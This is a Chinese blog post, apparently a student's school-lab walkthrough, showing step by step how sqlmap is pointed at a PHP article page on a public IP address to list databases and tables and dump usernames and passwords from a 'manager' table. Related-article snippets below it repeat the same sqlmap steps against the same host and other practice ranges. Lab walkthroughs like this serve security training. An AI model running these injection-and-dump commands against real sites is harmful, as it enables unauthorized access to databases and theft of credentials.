使用sqlmap注入(学校靶机)

最新推荐文章于 2023-10-15 17:40:24 发布
最新推荐文章于 2023-10-15 17:40:24 发布
阅读量4.2k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45808536/article/details/108520276
版权

使用sqlmap注入

一.先判断网站的注入点:寻找与数据库交互的地方
原网站:http://117.167.136.244:28019/index/narticle.php?nid=3100
判断是否存在注入点:更改后面的数字,看看是否和原网站相同,如果不同,表示存在注入点

二,把网站扔进sqlmap里`

python sqlmap.py -u"http://117.167.136.244:28019/index/narticle.php?nid=3100"

三,爆出所有数据库
python sqlmap.py -u “网址” --dbs

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" --dbs

在这里插入图片描述

四,选择数据库(rjxy)
python sqlmap.py -u “网址” -D 数据库名 --tables

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy --tables

在这里插入图片描述

五,选择数据表(manager)
python sqlmap.py -u “网址” -D 数据库名 -T 表名 --columns

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy -T manager --columns

在这里插入图片描述

六,导出字段(password,username)
python sqlmap.py -u “网址” -D 数据库名 -T 表名 -C 列名 --dump

python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy -T manager -C "password,username" --dump

在这里插入图片描述

然后就成功了

qq_45808536
关注
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 734
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
sqlmap测试靶机
weixin_44940180的博客
08-09 496
测试SQL注入 Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49" 可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload 获取数据库信息GET型 1. 获取数据库名字 sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="securit
sqlmap实战,攻击学校学院网站靶机
Marsper的博客
09-10 1808
sqlmap实战,获取学院网站靶机)管理员密码 首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法 然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 如下图 接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs 运行结果如下 接着选择rjxy数
sqlmap靶机实战
qq_46485934的博客
09-10 421
一.寻找目标网站注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
2020-09-10 sqlmap靶机实战
Rosalind_XG的博客
09-17 605
sqlmap靶机实战sql注入 一、寻找注入点 二、sqlmap中 1、查找数据库 sqlmap.py -u "注入点地址" sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” sqlmap.py -u “注入点地址” --dbs sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” --dbs 如图,得到该站点的全部数据库
【史上最全sqlmap通关sqli-labs靶场教程】
最新发布
DMXA的博客
10-15 4316
【史上最全sqlmap通关sqli-labs靶场教程】
sqlmap实战(学校靶机
weixin_50401030的博客
09-10 278
进入靶机 打开sqlmap 先找注入点,然后再将网站丢到sqlmap里面测试能不能注入 sqlmap.py -u "http://.../narticle.php?nid=3050" 这里显然是可以注入的,然后再找数据库 sqlmap.py -u "http://.../narticle.php?nid=3050" --dbs 找到数据库看到因为是软件学院所以显然是从rjxy下手找表 sqlmap.py -u "http://.../narticle.ph..
sqlmap实战(攻击靶机
weixin_50644630的博客
09-12 968
sqlmap实战(攻击学校靶机) 进入学校靶机 找到注入点,并放入sqlmap中测试是否可以注入 查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段
sqlmap注入实操(一)
inslight的博客
09-10 463
基础操作语句 一、检测注入点是否可用 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" 如果有若干询问语句,可添加一个参数 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --batch 二、暴库 1.数据库名称 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --dbs 三、web当前使用的数据库 sqlmap存放路径>sqlmap.pu -u+"需要检测的网址" --current -db 四、web服务器使用
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 338
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
利用sqlmap实战学校靶机
qq_45970858的博客
09-10 288
###利用sqlmap实战学校靶机 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击 行为。 产生原因:程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句;编写代码时未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句 1、这是我们需要构造语句,使其注入,尝试后面加上“index/narticle.php?nid=3100”,有语句显示,证明注入成功 2、打开sqlmap,开始操作, 将网站丢到sqlmap里面测试能不能注入
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_36352432的博客
12-23 374
靶场地址:封神台方法一、首先尝试手工找注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
渗透测试-sqlMap工具
weixin_49349476的博客
09-02 2700
利用sqlmap工具攻击web服务器的简单过程,攻击数据库,获取管理员账号和密码,登录网站
【笔记】使用Sqlmap对目标站点进行渗透攻击【基础实验】
小渣渣的博客
05-10 1759
使用Sqlmap对目标站点进行渗透攻击 使用kali Linux环境中的sqlmap实现对目标靶机网站注入猜解。 打开测试站点DVWA的主页面,并设置安全级别为low 单击左边的SQL Injection,打开如下图所示界面在User ID框中输入任意数字。 输入123456,运用burpsuite抓到的数据包如下: 在kali linux虚拟机的命令行状态下运行Sqlmap,并输入语句 ...
2020/9/10 使用sqlmap注入靶机演示)
weixin_45571987的博客
09-10 499
希望大家都可以动手学会sql注入
sqlmap使用方法(含靶场
0nc3的博客
11-06 7776
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
sqlmap注入参透网站完整过程
06-14 1190
1.测试网站是否支持注入http://www.xxx.com/xxx.asp?id=xxx and 1=1如果网站没报错,代表可注入2.用sqlmap查询注入sqlmap -u http://www.xxx.com/xxx.asp?id=xxx3.查询数据库中表名成功查询到的表名查询指定表的所有字段成功匹配的字段查看字段数据接收表字段数据成功获取用户表的用户,密码,邮箱​​​​​​​...
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1148
web安全之通过sqlmap工具对靶场进行练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值